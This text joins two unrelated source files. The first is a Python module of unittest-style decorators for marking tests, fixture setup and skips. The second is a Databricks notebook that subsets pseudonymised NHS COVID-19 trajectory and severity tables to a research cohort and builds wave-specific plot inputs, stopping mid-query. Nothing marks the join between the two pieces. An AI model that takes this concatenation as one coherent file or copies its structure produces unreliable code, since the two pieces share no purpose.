from typing import TypeVar, Callable
import unittest
from ._types import TestMethod
_F = TypeVar("_F", bound=TestMethod)
def test(method: _F) -> _F:
"""Decorator that flags a method as a test method."""
method._dectest_test = True # type: ignore
return method
def before(method: _F) -> _F:
"""Decorator that flags a method as fixture setup.
Fixture setup methods from base classes are guaranteed to be executed
before setup methods from derived classes.
"""
method._dectest_before = True # type: ignore
return method
def after(method: _F) -> _F:
"""Decorator that flags a method as fixture teardown.
Fixture teardown methods from base classes are guaranteed to be executed
after teardown methods from derived classes.
"""
method._dectest_after = True # type: ignore
return method
def skip(reason: str) -> Callable[[_F], _F]:
"""Unconditionally skip the decorated test.
This is equivalent to @unittest.skip, but also marks the decorated
function as a test.
"""
if not isinstance(reason, str):
raise TypeError("first argument to @skip must be a reason string")
def decorate(method: _F) -> _F:
return unittest.skip(reason)(test(method))
return decorate
def skip_if(condition: bool, reason: str) -> Callable[[_F], _F]:
"""Skip the decorated test if condition is true.
This is equivalent to @unittest.skipIf, but also marks the decorated
function as a test.
"""
def decorate(method: _F) -> _F:
return unittest.skipIf(condition, reason)(test(method))
return decorate
def skip_unless(condition: bool, reason: str) -> Callable[[_F], _F]:
"""Skip the decorated test unless condition is true.
This is equivalent to @unittest.skipUnless, but also marks the decorated
function as a test.
"""
def decorate(method: _F) -> _F:
return unittest.skipUnless(condition, reason)(test(method))
return decorate
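# Usage sketch: the decorators above only attach marker attributes; a
# dectest-style TestCase base class (not shown here) is what actually collects
# the flagged methods. The class and method names below are hypothetical.
if __name__ == "__main__":  # pragma: no cover
    class _ExampleSuite:
        @before
        def prepare_fixture(self) -> None:
            pass
        @test
        def example_check(self) -> None:
            pass
    # The decorators simply set marker attributes on the callables:
    assert getattr(_ExampleSuite.prepare_fixture, "_dectest_before", False)
    assert getattr(_ExampleSuite.example_check, "_dectest_test", False)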
# Databricks notebook source
# MAGIC %md
# MAGIC # CCU013_08 Paper subset data to cohort
# MAGIC
# MAGIC **Description**
# MAGIC
# MAGIC This notebook subsets the covid trajectory, severity and events tables to the cohort used for the phenotype severity paper.
# MAGIC
# MAGIC **Project(s)** CCU013
# MAGIC
# MAGIC **Author(s)** Johan Thygesen, Chris Tomlinson
# MAGIC
# MAGIC **Reviewer(s)**
# MAGIC
# MAGIC **Date last updated** 2022-01-22
# MAGIC
# MAGIC **Date last reviewed**
# MAGIC
# MAGIC **Date last run** 2022-01-22
# MAGIC
# MAGIC **Data input**
# MAGIC 1. Descriptive Paper methodology derived cohort
# MAGIC 2. Maximally inclusive COVID-19 related event phenotypes:
# MAGIC 1. `ccu013_covid_trajectory`
# MAGIC 2. `ccu013_covid_events_demographics`
# MAGIC
# MAGIC **Data output**
# MAGIC 1. `ccu013_covid_trajectory_paper_cohort` - Comprehensive long list of COVID-19 related events, subset to paper cohort
# MAGIC 2. `ccu013_covid_severity_paper_cohort` - Mutually exclusive 'worst' COVID-19 related event, 1 row per patient
# MAGIC 3. `ccu013_covid_events_demographics_paper_cohort`- Binary matrix of COVID-19 related events + demographics, 1 row per patient
# MAGIC
# MAGIC **Software and versions** SQL, python
# MAGIC
# MAGIC **Packages and versions** See cell below:
# MAGIC
# MAGIC **TODO**
# MAGIC * Implement long COVID search
# COMMAND ----------
# MAGIC %md
# MAGIC # 1 Subset Covid Phenotype data to the cohort population of interest
# COMMAND ----------
from pyspark.sql.functions import lit, col, udf
from functools import reduce
from pyspark.sql import DataFrame
from datetime import datetime
from pyspark.sql.types import DateType
# COMMAND ----------
# MAGIC %run /Workspaces/dars_nic_391419_j3w9t_collab/CCU013/COVID-19-SEVERITY-PHENOTYPING/CCU013_00_helper_functions
# COMMAND ----------
# MAGIC %md
# MAGIC ### 1.1 New approach (current) using the DP definition
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Individuals alive and registered in GDPPR on 23/01/2020
# MAGIC --- Old value = 55,876,173
# MAGIC --- Old @ 170821 = 56,609,049
# MAGIC --- Current value @ 220122 = 57,032,174
# MAGIC SELECT count(DISTINCT NHS_NUMBER_DEID) FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020
# COMMAND ----------
# MAGIC %md
# MAGIC #### 1.1.1 Find patients who do not have minimum follow up time
# MAGIC - Participants with non-fatal index events who had less than 28 days of follow up were excluded.
# COMMAND ----------
# MAGIC %sql
# MAGIC --- IMPORTANT: check that no death date is later than the study end date,
# MAGIC --- as that would cause errors in the code below
# MAGIC SELECT MAX(date)
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
# MAGIC WHERE covid_phenotype == '04_Fatal_with_covid_diagnosis' OR
# MAGIC covid_phenotype == '04_Fatal_without_covid_diagnosis' OR
# MAGIC covid_phenotype == '04_Covid_inpatient_death'
# COMMAND ----------
from pyspark.sql.functions import *
# Warning - update study end date
study_end_date = lit(datetime(2021, 11, 30))
all_fatal = spark.sql("""
SELECT person_id_deid, MIN(date) AS death_date
FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
WHERE (covid_phenotype == '04_Fatal_with_covid_diagnosis' OR
covid_phenotype == '04_Fatal_without_covid_diagnosis' OR
covid_phenotype == '04_Covid_inpatient_death')
AND date >= "2020-01-23"
GROUP BY person_id_deid
""")
# Get first covid event dates for everyone, except those with ONLY fatal events
followup_time = spark.sql("""
SELECT person_id_deid, MIN(date) AS first_covid_event
FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
WHERE (covid_phenotype != '04_Fatal_with_covid_diagnosis' AND
       covid_phenotype != '04_Fatal_without_covid_diagnosis' AND
       covid_phenotype != '04_Covid_inpatient_death')
AND date >= "2020-01-23"
GROUP BY person_id_deid
""")
# Calculate elapsed number of days between earliest event and study end (except if fatal)
followup_time = followup_time.join(all_fatal, ['person_id_deid'], how='left')
followup_time = followup_time.select(['person_id_deid', 'first_covid_event', 'death_date'])
followup_time = followup_time.withColumn('study_end', study_end_date)
followup_time= followup_time.withColumn('followup_days',
when(followup_time['death_date'].isNull(), datediff(followup_time['study_end'], followup_time['first_covid_event'])).otherwise(-1))
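# followup_days is set to -1 as a sentinel for anyone with a fatal COVID-19 event,
# since fatal index events are exempt from the 28-day minimum follow-up requirement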
# Mark deaths within 28 days
followup_time = followup_time.withColumn('28d_followup', \
when((followup_time['followup_days'] >= 28) | (followup_time['followup_days'] == -1), 1).otherwise(0))
#display(followup_time)
followup_time.createOrReplaceGlobalTempView('followup_time')
# COMMAND ----------
# MAGIC %md
# MAGIC Note that these counts are prior to joining onto the skinny table; in other words, they could include patients who don't meet the study inclusion criteria
# COMMAND ----------
# MAGIC %sql
# MAGIC -- Participants excluded due to lack of the 28-day minimum follow-up time.
# MAGIC -- OLD With study_end as 2021, 3, 31 -> 1,280,138
# MAGIC -- OLD WIth study_end as 2021, 5, 31 -> 1,081,496
# MAGIC -- current with study_end as 2021, 11, 30 -> 917,278
# MAGIC SELECT count(DISTINCT person_id_deid) FROM global_temp.followup_time
# MAGIC WHERE 28d_followup == 0
# COMMAND ----------
# MAGIC %sql
# MAGIC --- CHECK that no follow-up time is less than -1
# MAGIC SELECT * FROM global_temp.followup_time
# MAGIC where followup_days < -1
# COMMAND ----------
# MAGIC %md
# MAGIC #### 1.1.2 Subset trajectory table
# MAGIC Subset for cohort population - inclusion time and minimum follow-up
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Current @ 22.01.22 = 8,714,594
# MAGIC SELECT count (DISTINCT person_id_deid) from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Current @ 22.01.22 = 8,714,455
# MAGIC -- Removes only: 139 patients
# MAGIC SELECT count (DISTINCT person_id_deid) from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
# MAGIC WHERE date >= "2020-01-23" AND date <= "2021-11-30"
# COMMAND ----------
# MAGIC %sql
# MAGIC -- These are those records dated before index event
# MAGIC -- NB 597 unique IDs here, but these patients could also have events within the study dates
# MAGIC SELECT * from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
# MAGIC WHERE date < "2020-01-23" OR date > "2021-11-30"
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Subset trajectory table to cohort population and cohort timeline
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_paper_cohort_tmp AS
# MAGIC SELECT tab1.* FROM
# MAGIC dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory tab1
# MAGIC INNER JOIN
# MAGIC dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020 tab2
# MAGIC ON
# MAGIC tab1.person_id_deid = tab2.NHS_NUMBER_DEID
# MAGIC WHERE date >= "2020-01-23" AND date <= "2021-11-30"
# COMMAND ----------
# MAGIC %sql
# MAGIC -- Value @ 150621 3567617
# MAGIC -- Value @ 170821 3705123
# MAGIC -- Value @ 220222 8103909
# MAGIC SELECT count (DISTINCT person_id_deid) from global_temp.ccu013_covid_trajectory_paper_cohort_tmp
# COMMAND ----------
# MAGIC %sql
# MAGIC -- Remove those based on minimum follow-up criteria
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_paper_cohort as
# MAGIC WITH list_patients_to_omit AS (SELECT person_id_deid from global_temp.followup_time WHERE 28d_followup == 0)
# MAGIC SELECT /*+ BROADCAST(list_patients_to_omit) */ t.* FROM global_temp.ccu013_covid_trajectory_paper_cohort_tmp as t
# MAGIC LEFT ANTI JOIN list_patients_to_omit ON t.person_id_deid = list_patients_to_omit.person_id_deid
# COMMAND ----------
drop_table("ccu013_covid_trajectory_paper_cohort")
create_table("ccu013_covid_trajectory_paper_cohort")
# COMMAND ----------
# MAGIC %sql
# MAGIC OPTIMIZE dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort ZORDER BY person_id_deid
# COMMAND ----------
# MAGIC %sql
# MAGIC -- value @ 150621 = 3454653
# MAGIC -- value @ 170821 = 3469528
# MAGIC -- value @ 220122 = 7244925
# MAGIC SELECT count (DISTINCT person_id_deid) from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort
# COMMAND ----------
# MAGIC %sql
# MAGIC -- value @ 150621 = 8683174
# MAGIC -- value @ 170821 = 8825738
# MAGIC -- value @ 220122 = 13990423
# MAGIC SELECT count (*) as total_records from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT covid_phenotype, count (DISTINCT person_id_deid) as unique_ids, count (person_id_deid) as observations
# MAGIC from dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort
# MAGIC group by covid_phenotype
# MAGIC order by covid_phenotype
# COMMAND ----------
# MAGIC %md
# MAGIC #### 1.1.3 Recreate severity table using cohort only info
# COMMAND ----------
# MAGIC %sql
# MAGIC -- OLD value 5,044,357
# MAGIC -- Current value 8,714,594
# MAGIC SELECT count (DISTINCT person_id_deid) from dars_nic_391419_j3w9t_collab.ccu013_covid_severity
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_severity_paper_cohort AS
# MAGIC SELECT DISTINCT s.person_id_deid, s.date, s.covid_severity, s.ProductionDate FROM dars_nic_391419_j3w9t_collab.ccu013_covid_severity as s
# MAGIC INNER JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort as t
# MAGIC ON s.person_id_deid == t.person_id_deid
# COMMAND ----------
drop_table("ccu013_covid_severity_paper_cohort")
create_table("ccu013_covid_severity_paper_cohort")
# COMMAND ----------
# MAGIC %sql
# MAGIC REFRESH dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort
# COMMAND ----------
# MAGIC %sql
# MAGIC -- value @ 150621 = 3454653
# MAGIC -- value @ 170821 = 3469528
# MAGIC -- Current @ 220122 = 7244925
# MAGIC SELECT count(DISTINCT person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT count(*) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort
# COMMAND ----------
# MAGIC %md
# MAGIC # 2 Create input for patient trajectory plots
# MAGIC - Create order and simplified phenotype groups for the plots
# MAGIC - Get the first event date from the new simplified trajectory phenotypes and order by id, date and phenotype order.
# MAGIC - Calculate days between events and write to table for further processing in R
# MAGIC - see ccu013 R script ccu013_trajectory_finder.R for next steps
# COMMAND ----------
# MAGIC %md
# MAGIC ## 2.1 Full study period
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Query to get all events, including the unaffected event at the start of the pandemic, for all individuals in the study.
# MAGIC ---SELECT covid_severity, count(covid_severity) FROM (
# MAGIC SELECT person_id_deid, date, covid_phenotype, (CASE WHEN covid_severity IS NULL THEN '00_unaffected' ELSE covid_severity END) AS covid_severity, phenotype_order, trajectory_phenotype FROM (
# MAGIC SELECT NHS_NUMBER_DEID AS person_id_deid, DATE('2020-01-23') AS date, '00_Unaffected' AS covid_phenotype, covid_severity, 0 AS phenotype_order, 'Unaffected' AS trajectory_phenotype FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020 AS a
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort AS b ON a.NHS_NUMBER_DEID = b.person_id_deid)
# MAGIC ---)group by covid_severity
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Create an ordered and simplified phenotype groups table
# MAGIC --- This includes all events, including the unaffected event at the start of the pandemic, for all individuals in the study.
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_plot_data_tmp AS
# MAGIC SELECT * FROM
# MAGIC (SELECT DISTINCT tab1.person_id_deid, tab1.date, tab1.covid_phenotype, tab2.covid_severity,
# MAGIC (case covid_phenotype
# MAGIC when "01_Covid_positive_test" then 1
# MAGIC when "01_GP_covid_diagnosis" then 2
# MAGIC when "02_Covid_admission" then 3
# MAGIC when "03_NIV_treatment" then 4
# MAGIC when "03_ICU_admission" then 4
# MAGIC when "03_IMV_treatment" then 4
# MAGIC when "03_ECMO_treatment" then 4
# MAGIC when "04_Fatal_with_covid_diagnosis" then 5
# MAGIC when "04_Fatal_without_covid_diagnosis" then 5
# MAGIC when "04_Covid_inpatient_death" then 5 ELSE NULL end) as phenotype_order,
# MAGIC (case covid_phenotype
# MAGIC when "01_Covid_positive_test" then "Positive test"
# MAGIC when "01_GP_covid_diagnosis" then "Primary care diagnosis"
# MAGIC when "02_Covid_admission" then "Hospitalisation"
# MAGIC when "03_NIV_treatment" then "Critical care"
# MAGIC when "03_ICU_admission" then "Critical care"
# MAGIC when "03_IMV_treatment" then "Critical care"
# MAGIC when "03_ECMO_treatment" then "Critical care"
# MAGIC when "04_Fatal_with_covid_diagnosis" then "Death"
# MAGIC when "04_Fatal_without_covid_diagnosis" then "Death"
# MAGIC when "04_Covid_inpatient_death" then "Death" ELSE NULL end) as trajectory_phenotype
# MAGIC FROM
# MAGIC dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort as tab1
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity as tab2 ON tab1.person_id_deid = tab2.person_id_deid
# MAGIC UNION ALL
# MAGIC SELECT person_id_deid, date, covid_phenotype, (CASE WHEN covid_severity IS NULL THEN '00_unaffected' ELSE covid_severity END) AS covid_severity, phenotype_order, trajectory_phenotype FROM (
# MAGIC SELECT NHS_NUMBER_DEID AS person_id_deid, DATE('2020-01-23') AS date, '00_Unaffected' AS covid_phenotype, covid_severity, 0 AS phenotype_order, 'Unaffected' AS trajectory_phenotype FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020 AS a
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort AS b ON a.NHS_NUMBER_DEID = b.person_id_deid))
# MAGIC ORDER BY person_id_deid, date, phenotype_order
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Exemplar of ordered data
# MAGIC SELECT * from global_temp.ccu013_covid_trajectory_plot_data_tmp
# MAGIC WHERE person_id_deid = '00046L6S0IX8YE1'
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Example of the query used below to calculate time between events per ID
# MAGIC --- Get the event dates from the new trajectory phenotypes and order by id, date and phenotype order.
# MAGIC SELECT DISTINCT person_id_deid, min(date) as date, covid_severity, trajectory_phenotype, phenotype_order from global_temp.ccu013_covid_trajectory_plot_data_tmp
# MAGIC GROUP BY person_id_deid, phenotype_order, trajectory_phenotype, covid_severity
# MAGIC ORDER BY person_id_deid, date, phenotype_order
# COMMAND ----------
## 3) Calculate days between events and write to table for further processing in R
### see ccu013 R script ccu013_trajectory_finder.R for next steps
from pyspark.sql.functions import *
import pyspark.sql.functions as f
from pyspark.sql.window import Window
traject_data = spark.sql("""
SELECT DISTINCT person_id_deid, min(date) as date, covid_severity, trajectory_phenotype, phenotype_order from global_temp.ccu013_covid_trajectory_plot_data_tmp
GROUP BY person_id_deid, phenotype_order, trajectory_phenotype, covid_severity
ORDER BY person_id_deid, date, phenotype_order
""")
window = Window.partitionBy('person_id_deid').orderBy(['date', 'phenotype_order'])
# Calculate difference in days per ID
traject_data = traject_data.withColumn("days_passed", f.datediff(traject_data.date,
f.lag(traject_data.date, 1).over(window)))
#display(traject_data)
traject_data.createOrReplaceGlobalTempView("ccu013_covid_trajectory_graph_data")
drop_table("ccu013_covid_trajectory_graph_data")
create_table("ccu013_covid_trajectory_graph_data")
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Exemplar output for one individual
# MAGIC SELECT * FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data
# MAGIC WHERE person_id_deid = '00046L6S0IX8YE1'
# COMMAND ----------
# MAGIC %sql
# MAGIC REFRESH dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data
# COMMAND ----------
# MAGIC %sql
# MAGIC -- 56609049
# MAGIC -- 57032174
# MAGIC SELECT count (distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data
# COMMAND ----------
# MAGIC %md
# MAGIC ## 2.2 wave 1 - trajectory input
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Query to define all people included in wave 1
# MAGIC --- This is used below to subset the trajectory graph data
# MAGIC --- SELECT * FROM
# MAGIC SELECT count(distinct a.person_id_deid) FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as a
# MAGIC --- Remove anyone with a COVID-19 event before the start of wave 1
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-03-20") as t
# MAGIC ON a.person_id_deid = t.person_id_deid
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON a.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-03-20" OR death_date is null
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_graph_data_wave1 AS
# MAGIC SELECT * FROM
# MAGIC (SELECT a.person_id_deid, a.date, a.covid_severity, a.trajectory_phenotype, a.phenotype_order, a.days_passed
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data as a
# MAGIC INNER JOIN (SELECT j.person_id_deid FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as j
# MAGIC --- Remove anyone who had covid before the wave
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-03-20") as t
# MAGIC ON j.person_id_deid = t.person_id_deid
# MAGIC --- Remove anyone who died before the wave
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON j.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-03-20" OR death_date is null ) as b
# MAGIC ON a.person_id_deid == b.person_id_deid
# MAGIC WHERE date <= date_add(TO_DATE("2020-05-29"),28))
# COMMAND ----------
drop_table("ccu013_covid_trajectory_graph_data_wave1")
create_table("ccu013_covid_trajectory_graph_data_wave1")
# COMMAND ----------
# MAGIC %sql
# MAGIC -- old value - 56491308
# MAGIC -- current value = 56945027
# MAGIC SELECT count(distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Old = 57035046
# MAGIC --- current value = 57490005
# MAGIC SELECT count(*) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Old = 263,839
# MAGIC --- OBS Not sure this is in use any more
# MAGIC ---SELECT count (distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort_wave1
# COMMAND ----------
# MAGIC %sql
# MAGIC --- 3456753
# MAGIC --- 7232055
# MAGIC SELECT count (distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# MAGIC ---SELECT * FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# MAGIC WHERE covid_severity != "00_unaffected" ---AND date <= date_add(TO_DATE("2020-05-29"),28)
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Old value = 53034555
# MAGIC --- Current value @ = 49712972
# MAGIC SELECT count (distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# MAGIC ---SELECT * FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1
# MAGIC WHERE covid_severity == "00_unaffected" ---AND date <= date_add(TO_DATE("2020-05-29"),28)
# COMMAND ----------
# MAGIC %md
# MAGIC ## 2.3 wave 2 - trajectory input
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Old value = 55774208
# MAGIC --- New value @ 220122 = 56225024
# MAGIC --- Query to define all people included in wave 2
# MAGIC --- This is used below to subset the trajectory graph data
# MAGIC SELECT count(distinct a.person_id_deid) FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as a
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-09-30") as t
# MAGIC ON a.person_id_deid = t.person_id_deid
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON a.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-09-30" OR death_date is null
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_graph_data_wave2 AS
# MAGIC SELECT * FROM
# MAGIC (SELECT a.person_id_deid, a.date, a.covid_severity, a.trajectory_phenotype, a.phenotype_order, a.days_passed
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data as a
# MAGIC INNER JOIN (SELECT j.person_id_deid FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as j
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-09-30") as t
# MAGIC ON j.person_id_deid = t.person_id_deid
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON j.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-09-30" OR death_date is null ) as b
# MAGIC ON a.person_id_deid == b.person_id_deid
# MAGIC WHERE date <= date_add(TO_DATE("2021-02-12"),28))
# COMMAND ----------
drop_table("ccu013_covid_trajectory_graph_data_wave2")
create_table("ccu013_covid_trajectory_graph_data_wave2")
# COMMAND ----------
# MAGIC %md
# MAGIC # 3. Trajectory plot input - ICU only as Critical care.
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Create an ordered and simplified phenotype groups table
# MAGIC --- This includes all events, including the unaffected event at the start of the pandemic, for all individuals in the study.
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_plot_data_icu_tmp AS
# MAGIC SELECT * FROM
# MAGIC (SELECT DISTINCT tab1.person_id_deid, tab1.date, tab1.covid_phenotype, tab2.covid_severity,
# MAGIC (case covid_phenotype
# MAGIC when "01_Covid_positive_test" then 1
# MAGIC when "01_GP_covid_diagnosis" then 2
# MAGIC when "02_Covid_admission" then 3
# MAGIC when "03_NIV_treatment" then NULL
# MAGIC when "03_ICU_admission" then 4
# MAGIC when "03_IMV_treatment" then NULL
# MAGIC when "03_ECMO_treatment" then NULL
# MAGIC when "04_Fatal_with_covid_diagnosis" then 5
# MAGIC when "04_Fatal_without_covid_diagnosis" then 5
# MAGIC when "04_Covid_inpatient_death" then 5 ELSE NULL end) as phenotype_order,
# MAGIC (case covid_phenotype
# MAGIC when "01_Covid_positive_test" then "Positive test"
# MAGIC when "01_GP_covid_diagnosis" then "Primary care diagnosis"
# MAGIC when "02_Covid_admission" then "Hospitalisation"
# MAGIC when "03_NIV_treatment" then NULL
# MAGIC when "03_ICU_admission" then "ICU admission"
# MAGIC when "03_IMV_treatment" then NULL
# MAGIC when "03_ECMO_treatment" then NULL
# MAGIC when "04_Fatal_with_covid_diagnosis" then "Death"
# MAGIC when "04_Fatal_without_covid_diagnosis" then "Death"
# MAGIC when "04_Covid_inpatient_death" then "Death" ELSE NULL end) as trajectory_phenotype
# MAGIC FROM
# MAGIC dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort as tab1
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity as tab2 ON tab1.person_id_deid = tab2.person_id_deid
# MAGIC UNION ALL
# MAGIC SELECT person_id_deid, date, covid_phenotype, (CASE WHEN covid_severity IS NULL THEN '00_unaffected' ELSE covid_severity END) AS covid_severity, phenotype_order, trajectory_phenotype FROM (
# MAGIC SELECT NHS_NUMBER_DEID AS person_id_deid, DATE('2020-01-23') AS date, '00_Unaffected' AS covid_phenotype, covid_severity, 0 AS phenotype_order, 'Unaffected' AS trajectory_phenotype FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020 AS a
# MAGIC LEFT JOIN dars_nic_391419_j3w9t_collab.ccu013_covid_severity_paper_cohort AS b ON a.NHS_NUMBER_DEID = b.person_id_deid))
# MAGIC WHERE phenotype_order is not NULL
# MAGIC ORDER BY person_id_deid, date, phenotype_order
# COMMAND ----------
# MAGIC %sql
# MAGIC --- Exemplar of ordered data
# MAGIC SELECT * from global_temp.ccu013_covid_trajectory_plot_data_icu_tmp
# MAGIC WHERE person_id_deid = '00046L6S0IX8YE1'
# COMMAND ----------
## 3) Calculate days between events and write to table for further processing in R
### see ccu013 R script ccu013_trajectory_finder.R for next steps
from pyspark.sql.functions import *
import pyspark.sql.functions as f
from pyspark.sql.window import Window
traject_data = spark.sql("""
SELECT DISTINCT person_id_deid, min(date) as date, covid_severity, trajectory_phenotype, phenotype_order from global_temp.ccu013_covid_trajectory_plot_data_icu_tmp
GROUP BY person_id_deid, phenotype_order, trajectory_phenotype, covid_severity
ORDER BY person_id_deid, date, phenotype_order
""")
window = Window.partitionBy('person_id_deid').orderBy(['date', 'phenotype_order'])
# Calculate difference in days per ID
traject_data = traject_data.withColumn("days_passed", f.datediff(traject_data.date,
f.lag(traject_data.date, 1).over(window)))
#display(traject_data)
traject_data.createOrReplaceGlobalTempView("ccu013_covid_trajectory_graph_data_icu")
drop_table("ccu013_covid_trajectory_graph_data_icu")
create_table("ccu013_covid_trajectory_graph_data_icu")
# COMMAND ----------
# MAGIC %md
# MAGIC ### 3.1 Wave 1
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_graph_data_wave1_icu AS
# MAGIC SELECT * FROM
# MAGIC (SELECT a.person_id_deid, a.date, a.covid_severity, a.trajectory_phenotype, a.phenotype_order, a.days_passed
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_icu as a
# MAGIC INNER JOIN (SELECT j.person_id_deid FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as j
# MAGIC --- Remove anyone who had covid before the wave
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-03-20") as t
# MAGIC ON j.person_id_deid = t.person_id_deid
# MAGIC --- Remove anyone who died before the wave
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON j.person_id_deid = c.person_id_deid
